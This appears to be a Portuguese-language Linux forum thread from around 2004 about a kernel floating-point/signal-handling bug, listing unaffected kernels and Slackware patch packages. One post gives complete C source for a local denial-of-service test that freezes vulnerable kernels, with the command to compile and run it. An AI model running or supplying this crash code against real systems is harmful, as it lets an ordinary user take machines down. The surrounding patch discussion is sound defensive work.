+ Responder ao Tópico



  1. The safe kernels
    This code does nothing but exit with the error message Floating point exception and can not do any damage to systems running
    Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
    Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
    Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
    Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
    Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
    2.2.19-kernel

    o seu num eh gentoo eh?

  2. #12
    bouncer
    foda agora ter link pra pegar o kernel ja que esta tudo lotado....ehheh


    1c3_m4n

    vou ter que recompilar..tudo de novo..qual desse ser o certo
    mas pra serve esse bosta aqui em entao kernel-ide-2.4.26-i486-3.tgz



    Slackware 9.1 packages:
    614b79763721126939569f235d4524d6 kernel-ide-2.4.26-i486-3.tgz
    43681f735928641a2b5fc786604bca77 kernel-source-2.4.26-noarch-2.tgz


    Updated packages for Slackware 9.1:
    ftp://ftp.slackware.com/pub/slackwar....26-i486-3.tgz
    ftp://ftp.slackware.com/pub/slackwar...6-noarch-2.tgz
    ftp://ftp.slackware.com/pub/slackwar...tches/kernels/



  3. lah no site deles tem varios "mirrors" mas esses "mirrors" estao todos desatualizado, bom todos 5 q eu testei e o do brasil ta lotado tb

  4. não ir3_c4n uso o conectiva 8 e o Kurumin3.0

    Quem quiser se arriscar no teste do Kernel é só seguir os passos abaixo:

    Crie um arquivo com o código abaixo e chame-o de crash.c. Ou baixe-o diretamente daqui.

    #include
    #include
    #include

    static void Handler(int ignore)
    {
    char fpubuf[108];
    __asm__ __volatile__ ("fsave %0n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0n" : : "m"(fpubuf));
    }

    int main(int argc, char *argv[])
    {
    struct itimerval spec;
    signal(SIGALRM, Handler);
    spec.it_interval.tv_sec=0;
    spec.it_interval.tv_usec=100;
    spec.it_value.tv_sec=0;
    spec.it_value.tv_usec=100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while(1)
    write(1, ".", 1);

    return 0;
    }

    Em seguida rode o comando abaixo a partir de um terminal como usuário comum

    $ gcc crash.c -o evil && ./evil

    Se seu kernel tiver a vulnerabilidade explorada por esse programa, sua máquina vai travar completamente.

    Repito:ATENÇÃO: NÃO APLIQUE O TESTE ABAIXO NUM SERVIDOR EM PRODUÇÃO.
    É recomendável fazer backup, parar o serviço e executar o teste. O melhor é se informar no site de sua distro e obter atualizações, caso necessário.



  5. #15
    bouncer
    cara tenho que pegar so isso..
    aqui em
    1c3_m4n

    upgradepkg kernel-ide-2.4.26-i486-3.tgz
    upgradepkg kernel-source-2.4.26-noarch-2.tgz






Tópicos Similares

  1. Suporte a OSS no kernel 2.4.20?
    Por no fórum Servidores de Rede
    Respostas: 0
    Último Post: 18-06-2003, 18:51
  2. ipchains no kernel 2.4
    Por no fórum Servidores de Rede
    Respostas: 1
    Último Post: 29-04-2003, 16:19
  3. ext3 no kernel 2.4.12
    Por no fórum Servidores de Rede
    Respostas: 1
    Último Post: 16-03-2003, 16:12
  4. Ajuda no KERNEL
    Por duker no fórum Servidores de Rede
    Respostas: 3
    Último Post: 03-02-2003, 13:14
  5. Falha nos aliases.
    Por l00k no fórum Servidores de Rede
    Respostas: 3
    Último Post: 22-10-2002, 10:05

Visite: BR-Linux ·  VivaOLinux ·  Dicas-L